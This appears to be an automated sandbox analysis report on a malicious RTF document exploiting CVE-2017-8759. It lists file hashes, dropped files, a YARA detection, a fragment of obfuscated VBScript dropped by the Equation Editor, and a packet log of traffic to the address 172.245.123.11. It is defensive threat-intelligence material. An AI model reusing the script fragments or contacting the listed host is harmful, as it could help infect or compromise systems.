    SHA1:8900E172CCA8CC5F722080839161E99C85552F58
    SHA-256:481C59F2FE8407C9F079DCE8F3A9FA3BB747B8F0476278DBD1FA32656F23E892
    SHA-512:A5722527AE6352A17BBE2F3C7F219170C1F23D4CE91029D20B69BA66DA3637C38F52CB1EB05891BE7EDAE1678370CCF6BF272DF50A973B0ED9FE04288154F264
    Malicious:false
    Preview:[misc]..e2VMPAayU1.LNK=0..[folders]..e2VMPAayU1.LNK=0..
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.4797606462020307
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
    Malicious:false
    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category:dropped
    Size (bytes):421468
    Entropy (8bit):3.570272506767291
    Encrypted:false
    SSDEEP:3072:KHG9wf2YF/hNe4VTdRnTT8w4TWU7qtg/gl7p+lH1dS7tGd0LoJS7Et3Z+vYH:hwf2YFK7qi
    MD5:A7134156DC3A01AC743ED671C6FCE261
    SHA1:462834C8EAC709F4F6AE14DC8E88F8238B08CBE5
    SHA-256:96EBA88A40E1B29630E4D0CD374F3FE9B45EE1AD2F86821E824BF97D821A5CAE
    SHA-512:E473905BABF5515B8138AB83DA6946DFB7970C83FECD681659D3DD7A10CF0A7380FAB1C01D9C3931BAB0ECD25CDE09BC9B2D94BA1BFB4C21330DBD25EFD1545B
    Malicious:true
    Preview:..d.i.m. .t.h.e.r.m.i.a.t.r.i.a.E.E. .....t.h.e.r.m.i.a.t.r.i.a.E. .=. .p.a.g.o.d.e.i.r.o.........t.r.i.e.n.n.a.d.o.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.1._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.2._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.3._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.4._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.5._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.6._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.7._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.8._.0._.M.e.s.s.a.g.e.".).
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
    Category:dropped
    Size (bytes):55517
    Entropy (8bit):5.30676234288306
    Encrypted:false
    SSDEEP:384:323tHbrN79ozVzEFH3WeNIoDYVJKlanvlyLwxX7NhayqtumrNBmoUOIrqi6rGsNb:323b3WeDYiQLNEriP3rShAZqC6
    MD5:AB3F022617AE1F456128A6938CC68FD2
    SHA1:50DBEFB0BEB7EA267A4EF7C53DD3895FF63FB93F
    SHA-256:C9024051351EF1B1188206F8521D7BBF9E81BC9858CE91732352673C8609424D
    SHA-512:8DDCE4A4B6CE6FE1B8399A4A199ADDB750D0EB2020934CCEBFE4ACFA4C42941C6A468980EF90B648FC786C5F5F5E1386B09A466249684209FE826C61D57961E9
    Malicious:true
    Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.4797606462020307
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
    Malicious:false
    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
    Category:dropped
    Size (bytes):55517
    Entropy (8bit):5.30676234288306
    Encrypted:false
    SSDEEP:384:323tHbrN79ozVzEFH3WeNIoDYVJKlanvlyLwxX7NhayqtumrNBmoUOIrqi6rGsNb:323b3WeDYiQLNEriP3rShAZqC6
    MD5:AB3F022617AE1F456128A6938CC68FD2
    SHA1:50DBEFB0BEB7EA267A4EF7C53DD3895FF63FB93F
    SHA-256:C9024051351EF1B1188206F8521D7BBF9E81BC9858CE91732352673C8609424D
    SHA-512:8DDCE4A4B6CE6FE1B8399A4A199ADDB750D0EB2020934CCEBFE4ACFA4C42941C6A468980EF90B648FC786C5F5F5E1386B09A466249684209FE826C61D57961E9
    Malicious:true
    Yara Hits:
    • Rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2, Description: detects CVE-2017-8759 weaponized RTF documents., Source: C:\Users\user\Desktop\~WRD0000.tmp, Author: ditekSHen
    Antivirus:
    • Antivirus: Avira, Detection: 100%
    Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:modified
    Size (bytes):26
    Entropy (8bit):3.95006375643621
    Encrypted:false
    SSDEEP:3:ggPYV:rPYV
    MD5:187F488E27DB4AF347237FE461A079AD
    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
    Malicious:true
    Preview:[ZoneTransfer]....ZoneId=0
    File type:Rich Text Format data, version 1
    Entropy (8bit):2.789674812127989
    TrID:
    • Rich Text Format (5005/1) 55.56%
    • Rich Text Format (4004/1) 44.44%
    File name:e2VMPAayU1.rtf
    File size:96'629 bytes
    MD5:fbc6766776e17ffa02a6813e4f20b22b
    SHA1:58110a9f8f62038bd95eea66c74523320f075176
    SHA256:b5d48e4aa15901a84ad2c00a6b6a228471c3e5ad695f7ea11e584afa43543a69
    SHA512:0590d964829dee86a4d61460bcf0568234846a96bacb022ecabbddb251867aa00010b942a02b77757656d66ac007bc48c39848703fb2d5eedd30ce7a40faaaa8
    SSDEEP:768:mROe6H9B/3YLNQmIQ6B2QdKjKn6/FZEaO3QC4kE9yS:mR56XfONQmIQ6B2Q1n6DEaOgcEL
    TLSH:9893F15DD78F45A5CF48A23B032A0E4846FCB33EB31552B6796C973133AD93E09A6478
    File Content Preview:{\rtf1.......{\*\lineCrMod152884956 \#}.{\2934712125=]???4`;^?*!448.;9%(<.6?$..;05>.4,0?3*$</?%<9])1[`-'?-~;`4%.@??;%5.,#?),%*?91)7*8+47?!>-_?..61%3=0_!~3*5*[<.*?]&2(357%??^?7>(;?[!8[_^$[3(+?]<?2`>654[~:6-/7.4$^..#?10&`:)`8?5.1-_|1&)6>%:@3?.!?#[.?19[~?14'
    Icon Hash:2764a3aaaeb7bdbf
    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
    000001EAEhno
    TimestampSource PortDest PortSource IPDest IP
    Jul 31, 2024 08:37:59.502665043 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:37:59.508194923 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:37:59.508259058 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:37:59.508445978 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:37:59.513406992 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:37:59.995101929 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:37:59.995199919 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:37:59.995254040 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:37:59.995317936 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:37:59.995367050 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:37:59.995382071 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:37:59.995382071 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:37:59.995382071 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:37:59.995382071 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:37:59.995421886 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:37:59.995430946 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:37:59.995481968 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:37:59.995529890 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:37:59.995599985 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:37:59.995605946 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:37:59.995605946 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:37:59.995605946 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:37:59.995645046 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:37:59.995655060 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:37:59.995702982 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:37:59.998682976 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.000565052 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.000627995 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.000634909 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.000683069 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.000727892 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.000782967 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.007785082 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.007844925 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.083374977 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.083410978 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.083430052 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.083518982 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.083616018 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.083841085 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.088219881 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.088269949 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.088437080 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.088470936 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.088515043 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.088522911 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.088574886 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.093245983 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.093277931 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.093293905 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.093311071 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.093327999 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.093559980 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.098126888 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.098189116 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.098236084 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.098279953 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.098284006 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.098330021 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.098485947 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.098530054 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.102911949 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.102946997 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.103071928 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.103089094 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.103349924 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.108964920 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.109117985 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.109309912 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.109309912 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.144459009 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.144536972 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.144865990 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.172102928 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.172169924 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.172223091 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.172270060 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.172517061 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.172518015 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.177134991 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.177182913 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.177619934 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.177637100 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.177720070 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.177906036 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.177906990 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.182128906 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.182179928 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.182339907 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.182390928 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.182440042 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.182518959 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.182518959 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.182518959 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.182518959 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.186877966 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.186929941 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.187031984 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.187096119 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.187158108 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.187208891 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.187218904 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.187252045 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.191658020 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.191692114 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.191946030 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.191955090 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.191998959 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.192003012 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.192212105 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.196511984 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.196548939 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.196566105 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.196748018 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.196811914 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.196862936 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.196995020 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.196995020 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.201344013 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.201376915 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.201618910 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.201667070 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.201869011 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.206322908 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.206355095 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.206371069 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.206388950 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.206403971 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.206419945 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.206434965 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.206450939 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.206516981 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.206562996 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.206609011 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.206655025 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.206700087 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.206746101 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.206780910 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.206857920 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.206857920 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.206857920 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.206928015 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.206928015 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.206928015 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.207174063 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.260643005 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.260658979 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.260674953 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.260795116 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.260813951 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.261015892 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.261038065 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.261038065 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.261070967 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.261090994 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.261215925 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.261230946 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.261332989 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.261332989 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.261332989 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.261333942 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.261333942 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.261966944 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.262022972 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.262025118 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.262038946 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.262073040 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.262089014 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.262165070 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.262181044 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.262223959 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.262938976 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.262990952 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.262995958 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.263006926 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.263040066 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.263055086 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.263087034 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.263139963 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.263632059 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.263679981 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.263686895 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.263695955 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.263732910 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.263825893 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.263842106 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.263881922 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.264595985 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.264652967 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.264664888 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.264681101 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.264723063 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.264775038 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.264791012 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.264833927 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.265489101 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.265541077 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.265547037 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.265557051 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.265590906 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.265604973 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.265687943 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.265703917 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.265748024 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.266423941 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.266485929 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.266509056 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.266524076 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.266556025 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.266570091 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.266604900 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.266618967 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.266659975 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.267375946 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.267437935 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.267461061 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.267508984 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.267513990 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.267566919 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.267944098 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.268007040 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.268011093 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.268059969 CEST8049161172.245.123.11192.168.2.22
